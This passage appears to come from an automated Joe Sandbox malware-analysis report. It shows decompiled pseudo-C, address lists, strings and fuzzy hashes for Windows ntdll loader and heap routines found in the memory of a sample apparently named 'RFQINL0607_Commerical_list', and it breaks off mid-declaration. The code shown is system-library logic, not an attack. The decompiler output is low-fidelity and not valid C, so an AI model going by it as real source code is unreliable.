						_t52 =  *(_t69 + 4);
						L9:
						__eflags = _t64;
						if(_t64 == 0) {
							L12:
							_t69 = _t52;
							continue;
						}
						__eflags = _t52;
						if(_t52 == 0) {
							goto L12;
						}
						_t69 = _t69 ^ _t52;
						continue;
					}
					_t52 =  *_t69;
					goto L9;
				}
				goto L25;
			}


























                                                                                                                                                                                  0x333d43e2
                                                                                                                                                                                  0x333d43e5
                                                                                                                                                                                  0x333d43e7
                                                                                                                                                                                  0x333d43f3
                                                                                                                                                                                  0x333d43fa
                                                                                                                                                                                  0x333d4401
                                                                                                                                                                                  0x333d440b
                                                                                                                                                                                  0x333d440f
                                                                                                                                                                                  0x333d4414
                                                                                                                                                                                  0x333d4418
                                                                                                                                                                                  0x333d4420
                                                                                                                                                                                  0x333d4424
                                                                                                                                                                                  0x333d442e
                                                                                                                                                                                  0x333d442e
                                                                                                                                                                                  0x333d4426
                                                                                                                                                                                  0x333d4426
                                                                                                                                                                                  0x333d4426
                                                                                                                                                                                  0x333d4424
                                                                                                                                                                                  0x333d4433
                                                                                                                                                                                  0x333d445e
                                                                                                                                                                                  0x333d4443
                                                                                                                                                                                  0x333d4445
                                                                                                                                                                                  0x333d444b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d44c0
                                                                                                                                                                                  0x333d446a
                                                                                                                                                                                  0x333d446f
                                                                                                                                                                                  0x333d4471
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d4473
                                                                                                                                                                                  0x333d4479
                                                                                                                                                                                  0x333d447b
                                                                                                                                                                                  0x333d44d4
                                                                                                                                                                                  0x333d44d4
                                                                                                                                                                                  0x333d44db
                                                                                                                                                                                  0x333d44de
                                                                                                                                                                                  0x333d44e6
                                                                                                                                                                                  0x333d44e9
                                                                                                                                                                                  0x333d44ef
                                                                                                                                                                                  0x333d44f9
                                                                                                                                                                                  0x333d44fc
                                                                                                                                                                                  0x333d44ff
                                                                                                                                                                                  0x333d4502
                                                                                                                                                                                  0x333d451e
                                                                                                                                                                                  0x333d4523
                                                                                                                                                                                  0x333d44c9
                                                                                                                                                                                  0x333d44d1
                                                                                                                                                                                  0x333d44d1
                                                                                                                                                                                  0x333d4489
                                                                                                                                                                                  0x333d448f
                                                                                                                                                                                  0x333d4491
                                                                                                                                                                                  0x333d4493
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d4495
                                                                                                                                                                                  0x333d4498
                                                                                                                                                                                  0x333d449a
                                                                                                                                                                                  0x333d449c
                                                                                                                                                                                  0x333d44b8
                                                                                                                                                                                  0x333d44bb
                                                                                                                                                                                  0x333d44bb
                                                                                                                                                                                  0x333d44be
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d44b2
                                                                                                                                                                                  0x333d44b4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d44b6
                                                                                                                                                                                  0x333d44b6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d44b8
                                                                                                                                                                                  0x333d449e
                                                                                                                                                                                  0x333d44a0
                                                                                                                                                                                  0x333d44a2
                                                                                                                                                                                  0x333d44a4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d44a6
                                                                                                                                                                                  0x333d44a6
                                                                                                                                                                                  0x333d44a6
                                                                                                                                                                                  0x333d44a8
                                                                                                                                                                                  0x333d44aa
                                                                                                                                                                                  0x333d44ac
                                                                                                                                                                                  0x333d44ac
                                                                                                                                                                                  0x333d44b0
                                                                                                                                                                                  0x333d44c4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d44c4
                                                                                                                                                                                  0x333d444d
                                                                                                                                                                                  0x333d4450
                                                                                                                                                                                  0x333d4450
                                                                                                                                                                                  0x333d4452
                                                                                                                                                                                  0x333d445c
                                                                                                                                                                                  0x333d445c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d445c
                                                                                                                                                                                  0x333d4454
                                                                                                                                                                                  0x333d4456
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d4458
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d4458
                                                                                                                                                                                  0x333d4447
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d4447
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 333D4508
                                                                                                                                                                                  • LdrpCheckRedirection, xrefs: 333D450F
                                                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 333D4519
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                  • API String ID: 3446177414-3154609507
                                                                                                                                                                                  • Opcode ID: 3fcde9439c4b6d1f7db8fabe4795fbe44478be8fd85ddbd7f975e00791cc96c1
                                                                                                                                                                                  • Instruction ID: 2c696bb249ceb3c03473f2d666168b1b554beade9dafa4b474e5ea52a6c0a329
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fcde9439c4b6d1f7db8fabe4795fbe44478be8fd85ddbd7f975e00791cc96c1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6341BC77A453119FDB10CF68C940A16F7F8AF88690B09C6A9FC98E7255DF30D8C08B81
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33347662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 29%
                                                                                                                                                                                  			E33347662(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E3334B910();
					} else {
						E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E3334B910("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E3334B910(", passed to %s", _t29);
					}
					_push("\n");
					E3334B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x334447a1 = 1;
						asm("int3");
						 *0x334447a1 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                                                                                                                                  0x33347667
                                                                                                                                                                                  0x33347669
                                                                                                                                                                                  0x33347672
                                                                                                                                                                                  0x333aad93
                                                                                                                                                                                  0x333aadb2
                                                                                                                                                                                  0x333aadb7
                                                                                                                                                                                  0x333aad95
                                                                                                                                                                                  0x333aadaa
                                                                                                                                                                                  0x333aadaf
                                                                                                                                                                                  0x333aadc3
                                                                                                                                                                                  0x333aadcc
                                                                                                                                                                                  0x333aadd4
                                                                                                                                                                                  0x333aadda
                                                                                                                                                                                  0x333aaddb
                                                                                                                                                                                  0x333aade0
                                                                                                                                                                                  0x333aadf0
                                                                                                                                                                                  0x333aadf2
                                                                                                                                                                                  0x333aadf9
                                                                                                                                                                                  0x333aadfa
                                                                                                                                                                                  0x333aadfa
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333aae01
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                                                  • API String ID: 0-3061284088
                                                                                                                                                                                  • Opcode ID: d70a2a425c48318c6ac4f131993c7c1c60a6aa13f6aa90fb1586d79ff8598ff8
                                                                                                                                                                                  • Instruction ID: 1e8734c8238a0ab62458978ec5ac418dd16e89028a75b34aa7678163ae3ef9cf
                                                                                                                                                                                  • Opcode Fuzzy Hash: d70a2a425c48318c6ac4f131993c7c1c60a6aa13f6aa90fb1586d79ff8598ff8
                                                                                                                                                                                  • Instruction Fuzzy Hash: D5014C37806390BEF3059F3CE859F827BE4EB41771F18C099F08097A92CAB9D844D650
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3335A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                                                  			E3335A2E0(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, signed short* _a12) {
				char _v12;
				char* _v16;
				char _v20;
				char* _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				char _v44;
				signed int _v48;
				signed int _v52;
				void* _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				char _v81;
				signed int _v84;
				void* _v88;
				void* _v89;
				signed short _v92;
				char _v93;
				void* _v100;
				void* _v101;
				intOrPtr* _t122;
				signed char* _t123;
				signed char* _t125;
				intOrPtr* _t128;
				signed char* _t129;
				signed char* _t131;
				intOrPtr _t133;
				signed int _t139;
				signed short* _t159;
				intOrPtr _t163;
				signed int _t178;
				signed int _t183;

				_t122 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				_v48 = __edx;
				_v52 = __ecx;
				_v64 = 0;
				_v28 = 0x3a0038;
				_v24 = L"LdrResFallbackLangList Enter";
				_v20 = 0x380036;
				_v16 = L"LdrResFallbackLangList Exit";
				if(_t122 != 0) {
					if( *_t122 == 0) {
						goto L1;
					}
					_t123 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					L2:
					if(( *_t123 & 0x00000001) != 0) {
						if(L33363C40() == 0) {
							_t125 = 0x7ffe0384;
						} else {
							_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						L333DFC01( &_v28,  *_t125 & 0x000000ff);
					}
					_t159 = _a12;
					if(_t159 == 0) {
						_t163 = 0xc000000d;
						_v68 = 0xc000000d;
						goto L35;
					} else {
						_t183 = 0;
						 *_t159 = 0;
						_t159[0x102] = 0;
						_v60 = 0;
						_v68 = 0;
						_v81 = 0;
						_v56 = 0;
						while(1) {
							L5:
							_v72 = 0;
							while(1) {
								L6:
								_t139 = _t183;
								_t178 = _t183;
								_t183 = _t183 + 1;
								if(_t139 > 7) {
									break;
								}
								switch( *((intOrPtr*)(_t139 * 4 +  &M3335A60C))) {
									case 0:
										__ax = _a4;
										_v64 = 1;
										goto L14;
									case 1:
										if((_a8 & 0x00000004) != 0) {
											 *((char*)(__ebx + 0x204)) = 1;
											goto L34;
										}
										if((_a4 & 0x000003ff) != 0) {
											__edx =  &_v76;
											 *((char*)(__ebx + 0x204)) = 1;
											if(E333488C8(__ecx, __edx) < 0) {
												goto L34;
											}
											__ax = _v76;
											_v72 = __ax;
											__eax = _v72;
											if(__ax != 0) {
												__esi = __edi;
											} else {
												__esi = __esi | 0xffffffff;
											}
											L30:
											_v64 = 2;
											goto L15;
										}
										__eax = 0xeeee;
										_v72 = 0xeeee;
										goto L30;
									case 2:
										_v80 = 0;
										if(E3335A630() == 0) {
											goto L24;
										}
										_t166 = _v60;
										if(_v60 >= ( *( *( *[fs:0x18] + 0xfc0) + 4) & 0x0000ffff)) {
											goto L24;
										}
										E3335A750( *( *[fs:0x18] + 0xfc0), _t166,  &_v80,  &_v81);
										_t149 = _v92 & 0x0000ffff;
										_v84 = _t149;
										if(_t149 == 0) {
											goto L24;
										}
										if(_v81 != 0) {
											if((_a8 & 0x00100000) != 0) {
												_v72 = 0xeeee;
												_t149 = _v72;
											}
										}
										_v60 = _v60 + 1;
										_t183 = _t178;
										_v64 = 3;
										goto L15;
									case 3:
										__eax = _v52;
										if(__eax == 0) {
											L24:
											_v72 = 0xeeee;
											goto L6;
										}
										__edx = _v48;
										 &_v36 =  &_v44;
										__ecx = __eax;
										__eax = E3335A1E3(__ecx, __edx,  &_v44,  &_v36, _a8);
										if(__eax >= 0) {
											 &_v12 = E33395050(__ecx,  &_v12, _v44);
											 &_v48 =  &_v20;
											__eax = E333756E0( &_v20,  &_v48);
											if(__al == 0) {
												_v68 = 0xc00b0005;
												goto L24;
											}
											__ax =  *((intOrPtr*)(__esp + 0x3c));
											_v72 = __eax;
											_v80 = __ax;
											if((_a8 & 0x00100000) != 0) {
												__edx =  *[fs:0x18];
												 &_v81 =  &_v80;
												__edx =  *( *[fs:0x18] + 0xfc0);
												__eax = E3335A750(__edx, 0,  &_v80,  &_v81);
												if(_v93 == 0) {
													__ax = _v80;
													_v72 = __eax;
												} else {
													__eax = 0xeeee;
													_v72 = __ax;
												}
											}
											__eax = _v36;
											__al = __al & 0x00000001;
											__al & 0x000000ff =  ~(__al & 0x000000ff);
											asm("sbb eax, eax");
											 ~(__al & 0x000000ff) & 0x00000006 = ( ~(__al & 0x000000ff) & 0x00000006) + 4;
											_v64 = ( ~(__al & 0x000000ff) & 0x00000006) + 4;
											__eax = _v72;
											goto L15;
										}
										goto L24;
									case 4:
										__eax = 0xeeee;
										_v80 = __ax;
										__eax = _a8;
										__eax =  !_a8;
										if((__eax & 0x00080000) != 0) {
											goto L34;
										}
										if( *[fs:0x18] == 0) {
											__ax = _v80;
											goto L5;
										}
										__eax =  *[fs:0x18];
										__ax =  *((intOrPtr*)(__eax + 0xc4));
										goto L14;
									case 5:
										__eax = 0xeeee;
										_v72 = __ax;
										__eax =  &_v56;
										_push( &_v56);
										_push("true");
										__eax = E33392AE0();
										_v76 = __eax;
										if(__eax < 0) {
											goto L6;
										}
										__ax = _v56;
										goto L14;
									case 6:
										__eax = 0xeeee;
										_v72 = __ax;
										__eax =  &_v32;
										_push( &_v32);
										_push(0);
										__eax = E33392AE0();
										_v76 = __eax;
										if(__eax < 0) {
											goto L6;
										}
										__eax = _v32;
										if(__eax == _v56) {
											goto L6;
										}
										L14:
										_v72 = __eax;
										L15:
										if(_t149 == 0xeeee) {
											goto L6;
										}
										goto L16;
									case 7:
										__eax = 0x409;
										_v72 = __ax;
										L16:
										_t179 =  *_t159 & 0x0000ffff;
										_t168 = 0;
										_t175 = _t179;
										if(_t175 == 0) {
											L20:
											if(_t179 >= 0x40) {
												goto L34;
											}
											 *((short*)(_t159 + 4 + _t175 * 8)) = _v72;
											 *(_t159 + 8 + ( *_t159 & 0x0000ffff) * 8) = _v64;
											 *_t159 =  *_t159 + 1;
											goto L6;
										} else {
											_t152 =  &(_t159[2]);
											while(1) {
												_t179 =  *_t159 & 0x0000ffff;
												if( *_t152 == _v72) {
													break;
												}
												_t168 = _t168 + 1;
												_t152 =  &(_t152[4]);
												if(_t168 < _t175) {
													continue;
												}
												goto L20;
											}
											if(_t168 < _t175) {
												goto L6;
											}
											goto L20;
										}
								}
							}
							L34:
							_t163 = _v68;
							L35:
							_t128 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
							if(_t128 != 0) {
								if( *_t128 == 0) {
									goto L36;
								}
								_t129 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								L37:
								if(( *_t129 & 0x00000001) != 0) {
									if(L33363C40() == 0) {
										_t131 = 0x7ffe0384;
									} else {
										_t131 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
									}
									L333DFC01( &_v20,  *_t131 & 0x000000ff);
									_t133 = _v68;
								} else {
									_t133 = _t163;
								}
								return _t133;
							}
							L36:
							_t129 = 0x7ffe0385;
							goto L37;
						}
					}
				}
				L1:
				_t123 = 0x7ffe0385;
				goto L2;
			}








































                                                                                                                                                                                  0x3335a2f4
                                                                                                                                                                                  0x3335a2f7
                                                                                                                                                                                  0x3335a2fb
                                                                                                                                                                                  0x3335a2ff
                                                                                                                                                                                  0x3335a307
                                                                                                                                                                                  0x3335a30f
                                                                                                                                                                                  0x3335a317
                                                                                                                                                                                  0x3335a31f
                                                                                                                                                                                  0x3335a329
                                                                                                                                                                                  0x333b29f7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b2a06
                                                                                                                                                                                  0x3335a334
                                                                                                                                                                                  0x3335a337
                                                                                                                                                                                  0x333b2a17
                                                                                                                                                                                  0x333b2a29
                                                                                                                                                                                  0x333b2a19
                                                                                                                                                                                  0x333b2a22
                                                                                                                                                                                  0x333b2a22
                                                                                                                                                                                  0x333b2a35
                                                                                                                                                                                  0x333b2a35
                                                                                                                                                                                  0x3335a33d
                                                                                                                                                                                  0x3335a342
                                                                                                                                                                                  0x333b2a3f
                                                                                                                                                                                  0x333b2a44
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a348
                                                                                                                                                                                  0x3335a34a
                                                                                                                                                                                  0x3335a34e
                                                                                                                                                                                  0x3335a351
                                                                                                                                                                                  0x3335a357
                                                                                                                                                                                  0x3335a35b
                                                                                                                                                                                  0x3335a35f
                                                                                                                                                                                  0x3335a363
                                                                                                                                                                                  0x3335a367
                                                                                                                                                                                  0x3335a367
                                                                                                                                                                                  0x3335a367
                                                                                                                                                                                  0x3335a370
                                                                                                                                                                                  0x3335a370
                                                                                                                                                                                  0x3335a370
                                                                                                                                                                                  0x3335a372
                                                                                                                                                                                  0x3335a374
                                                                                                                                                                                  0x3335a378
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a37e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a3ff
                                                                                                                                                                                  0x3335a403
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a4af
                                                                                                                                                                                  0x333b2b05
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b2b05
                                                                                                                                                                                  0x3335a4bc
                                                                                                                                                                                  0x333b2a52
                                                                                                                                                                                  0x333b2a56
                                                                                                                                                                                  0x333b2a64
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b2a6a
                                                                                                                                                                                  0x333b2a6f
                                                                                                                                                                                  0x333b2a77
                                                                                                                                                                                  0x333b2a7b
                                                                                                                                                                                  0x333b2a85
                                                                                                                                                                                  0x333b2a7d
                                                                                                                                                                                  0x333b2a7d
                                                                                                                                                                                  0x333b2a7d
                                                                                                                                                                                  0x3335a4cb
                                                                                                                                                                                  0x3335a4cb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a4cb
                                                                                                                                                                                  0x3335a4c2
                                                                                                                                                                                  0x3335a4c7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a387
                                                                                                                                                                                  0x3335a393
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a39f
                                                                                                                                                                                  0x3335a3af
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a3cd
                                                                                                                                                                                  0x3335a3d2
                                                                                                                                                                                  0x3335a3d7
                                                                                                                                                                                  0x3335a3de
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a3e9
                                                                                                                                                                                  0x333b2a93
                                                                                                                                                                                  0x333b2a9e
                                                                                                                                                                                  0x333b2aa3
                                                                                                                                                                                  0x333b2aa3
                                                                                                                                                                                  0x333b2a93
                                                                                                                                                                                  0x3335a3ef
                                                                                                                                                                                  0x3335a3f3
                                                                                                                                                                                  0x3335a3f5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a46a
                                                                                                                                                                                  0x3335a470
                                                                                                                                                                                  0x3335a492
                                                                                                                                                                                  0x3335a497
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a497
                                                                                                                                                                                  0x3335a475
                                                                                                                                                                                  0x3335a47e
                                                                                                                                                                                  0x3335a483
                                                                                                                                                                                  0x3335a485
                                                                                                                                                                                  0x3335a48c
                                                                                                                                                                                  0x3335a5b5
                                                                                                                                                                                  0x3335a5bf
                                                                                                                                                                                  0x3335a5c4
                                                                                                                                                                                  0x3335a5cb
                                                                                                                                                                                  0x333b2aee
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b2aee
                                                                                                                                                                                  0x3335a5d8
                                                                                                                                                                                  0x3335a5dd
                                                                                                                                                                                  0x3335a5e1
                                                                                                                                                                                  0x3335a5e6
                                                                                                                                                                                  0x333b2aac
                                                                                                                                                                                  0x333b2ab8
                                                                                                                                                                                  0x333b2abd
                                                                                                                                                                                  0x333b2ac5
                                                                                                                                                                                  0x333b2acf
                                                                                                                                                                                  0x333b2ae0
                                                                                                                                                                                  0x333b2ae5
                                                                                                                                                                                  0x333b2ad1
                                                                                                                                                                                  0x333b2ad1
                                                                                                                                                                                  0x333b2ad6
                                                                                                                                                                                  0x333b2ad6
                                                                                                                                                                                  0x333b2acf
                                                                                                                                                                                  0x3335a5ec
                                                                                                                                                                                  0x3335a5f0
                                                                                                                                                                                  0x3335a5f5
                                                                                                                                                                                  0x3335a5f7
                                                                                                                                                                                  0x3335a5fc
                                                                                                                                                                                  0x3335a5ff
                                                                                                                                                                                  0x3335a603
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a603
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a4d8
                                                                                                                                                                                  0x3335a4dd
                                                                                                                                                                                  0x3335a4e2
                                                                                                                                                                                  0x3335a4e5
                                                                                                                                                                                  0x3335a4ec
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a4f6
                                                                                                                                                                                  0x333b2afb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b2afb
                                                                                                                                                                                  0x3335a4fc
                                                                                                                                                                                  0x3335a502
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a53c
                                                                                                                                                                                  0x3335a541
                                                                                                                                                                                  0x3335a546
                                                                                                                                                                                  0x3335a54a
                                                                                                                                                                                  0x3335a54b
                                                                                                                                                                                  0x3335a54d
                                                                                                                                                                                  0x3335a552
                                                                                                                                                                                  0x3335a558
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a55e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a568
                                                                                                                                                                                  0x3335a56d
                                                                                                                                                                                  0x3335a572
                                                                                                                                                                                  0x3335a576
                                                                                                                                                                                  0x3335a577
                                                                                                                                                                                  0x3335a579
                                                                                                                                                                                  0x3335a57e
                                                                                                                                                                                  0x3335a584
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a58a
                                                                                                                                                                                  0x3335a592
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a40b
                                                                                                                                                                                  0x3335a40b
                                                                                                                                                                                  0x3335a40f
                                                                                                                                                                                  0x3335a417
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a59d
                                                                                                                                                                                  0x3335a5a2
                                                                                                                                                                                  0x3335a41d
                                                                                                                                                                                  0x3335a41d
                                                                                                                                                                                  0x3335a420
                                                                                                                                                                                  0x3335a422
                                                                                                                                                                                  0x3335a426
                                                                                                                                                                                  0x3335a444
                                                                                                                                                                                  0x3335a448
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a456
                                                                                                                                                                                  0x3335a45e
                                                                                                                                                                                  0x3335a462
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a428
                                                                                                                                                                                  0x3335a428
                                                                                                                                                                                  0x3335a430
                                                                                                                                                                                  0x3335a437
                                                                                                                                                                                  0x3335a43a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a43c
                                                                                                                                                                                  0x3335a43d
                                                                                                                                                                                  0x3335a442
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a442
                                                                                                                                                                                  0x3335a4a3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a4a9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a37e
                                                                                                                                                                                  0x3335a50e
                                                                                                                                                                                  0x3335a50e
                                                                                                                                                                                  0x3335a512
                                                                                                                                                                                  0x3335a518
                                                                                                                                                                                  0x3335a51d
                                                                                                                                                                                  0x333b2b14
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b2b23
                                                                                                                                                                                  0x3335a528
                                                                                                                                                                                  0x3335a52b
                                                                                                                                                                                  0x333b2b34
                                                                                                                                                                                  0x333b2b46
                                                                                                                                                                                  0x333b2b36
                                                                                                                                                                                  0x333b2b3f
                                                                                                                                                                                  0x333b2b3f
                                                                                                                                                                                  0x333b2b52
                                                                                                                                                                                  0x333b2b57
                                                                                                                                                                                  0x3335a531
                                                                                                                                                                                  0x3335a531
                                                                                                                                                                                  0x3335a531
                                                                                                                                                                                  0x3335a539
                                                                                                                                                                                  0x3335a539
                                                                                                                                                                                  0x3335a523
                                                                                                                                                                                  0x3335a523
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335a523
                                                                                                                                                                                  0x3335a367
                                                                                                                                                                                  0x3335a342
                                                                                                                                                                                  0x3335a32f
                                                                                                                                                                                  0x3335a32f
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                  • API String ID: 0-379654539
                                                                                                                                                                                  • Opcode ID: 076098592c1d51444b2dc0e5b053918aab313f6ff606bd429afbc770c9343a94
                                                                                                                                                                                  • Instruction ID: 0da0630e41ba29c423b41f405aa2281a3cbe88488ec59116d23c2c0199d34e62
                                                                                                                                                                                  • Opcode Fuzzy Hash: 076098592c1d51444b2dc0e5b053918aab313f6ff606bd429afbc770c9343a94
                                                                                                                                                                                  • Instruction Fuzzy Hash: B5C16AB4508382CFE712CF58C480B5AB7F8BF85744F04896AF895CB650EB34CA46DB96
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33388322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 36%
                                                                                                                                                                                  			E33388322() {
				intOrPtr _v0;
				signed int _v8;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				intOrPtr _v200;
				char _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char* _v236;
				intOrPtr _v240;
				char _v244;
				signed short _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				intOrPtr _v272;
				short _v274;
				char _v276;
				signed int _v280;
				char _v284;
				char _v288;
				char _v292;
				char _v293;
				intOrPtr _v297;
